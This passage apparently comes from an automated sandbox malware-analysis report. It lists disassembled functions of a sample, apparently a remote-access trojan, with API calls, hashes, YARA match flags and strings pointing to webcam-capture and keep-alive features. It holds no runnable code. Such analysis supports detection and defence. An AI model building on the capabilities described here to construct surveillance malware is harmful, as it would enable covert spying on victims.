                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 225f6d3dbd6fb53d41383bb79f5c3d85c0f86ed4bf7db3091f23b13824b490fe
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                                                                                                                                                                                                                              Function 02834B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02834AEA,?,?,02834A8A,?,02842238,0000000C,02834BBD,00000000,00000000), ref: 02834B59
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02834B6C
                                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,02834AEA,?,?,02834A8A,?,02842238,0000000C,02834BBD,00000000,00000000,00000001,02832082), ref: 02834B8F
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3532296ea3c60a1a23bc0ea4686745d99d44e9fdb0a0a8ecdf60caf9cb089eaf
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 13cfdb73a33b2c7669b28cc13598ad9d67f42f470d5c4113fb7a45697a804fbd
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3532296ea3c60a1a23bc0ea4686745d99d44e9fdb0a0a8ecdf60caf9cb089eaf
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13F0AF3DE40208BBEB129FA4D818FDDBFB9EF04711F004564F809E2290DB359961CA90
                                                                                                                                                                                                                                                                                                                              Function 10014C41 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10014BF2,00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002), ref: 10014C61
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10014C74
                                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,10014BF2,00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002), ref: 10014C97
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 873052653539bccc7e1ea00198fc24244249cfb0554d021f73da006c918f9e5c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b1000cfdb8d1dca94868537454e3314dce1bc17294372af6874ad0ad3cb996e2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873052653539bccc7e1ea00198fc24244249cfb0554d021f73da006c918f9e5c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAF06230901228BBEB41DF90DC48FAEBFB8EF15355F514168F909A6160CF309E92DB90
                                                                                                                                                                                                                                                                                                                              Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(00000280), ref: 00404AF9
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                                                                                                                                                              • String ID: KeepAlive | Disabled
                                                                                                                                                                                                                                                                                                                              • API String ID: 2993684571-305739064
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a65dbfd1ab44fba886614346d35be3b3c9a16cb6438da6d55506515bd6f1299a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a65dbfd1ab44fba886614346d35be3b3c9a16cb6438da6d55506515bd6f1299a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                                                                                                                                                                                                                                                                                                                              Function 0041BE7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                                                                                                                                                                                                                                                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                                                                                                                                                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                                                                                                                                                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                                                                                                                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                                                                                                                                                                              • API String ID: 3024135584-2418719853
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                                                                                                                                                                                                                              Function 0044017A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 092d045fd4dfbc3abfb12b6361b7e91f54830b77947eddd119647d88fc19d888
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 092d045fd4dfbc3abfb12b6361b7e91f54830b77947eddd119647d88fc19d888
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                                                                                                                                                                                                                                                                                                                              Function 00403DE7 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 135sleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: H_prologSleep
                                                                                                                                                                                                                                                                                                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                                                                                                                                                                                                                              • API String ID: 3469354165-3547787478
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9166bbbe7b9eac99d93036b71c4c24ed519719f38fddb81ef556455d13d85140
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9166bbbe7b9eac99d93036b71c4c24ed519719f38fddb81ef556455d13d85140
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                                                                                                                                                                                                                                                                                                                              Function 004430A8 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                                                                                                                                                                                                                                                                                                                              Function 10015615 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7a457cb0477eb42b08a3a08fc8a8e94251b23341f2866997a7d328c6d90e6a15
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b33cccb8fbb3b2afb8450da89680e76c8306b4c6ac74daa2382c705215a82a31
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a457cb0477eb42b08a3a08fc8a8e94251b23341f2866997a7d328c6d90e6a15
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B41B236A00200DFDB14CF78C981A5EB3E5EF89754F6A4168E515EF291EB32ED41CB81
                                                                                                                                                                                                                                                                                                                              Function 0044FEE3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63), ref: 0044FF30
                                                                                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0044FF68
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?), ref: 0044FFB9
                                                                                                                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?,00000002,?), ref: 0044FFCB
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0044FFD4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 313313983-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 88201f02e49098e6f592975d0299b58774541eebf8c41212138823b53665fa5d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88201f02e49098e6f592975d0299b58774541eebf8c41212138823b53665fa5d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                                                                                                                                                                                                                                                                                                                              Function 0044E14B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044E1B0
                                                                                                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                                                                                                                                                                                                                                                                                                              Function 02837153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0283715C
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0283717F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02835702
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 028371A5
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028371B8
                                                                                                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 028371C7
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
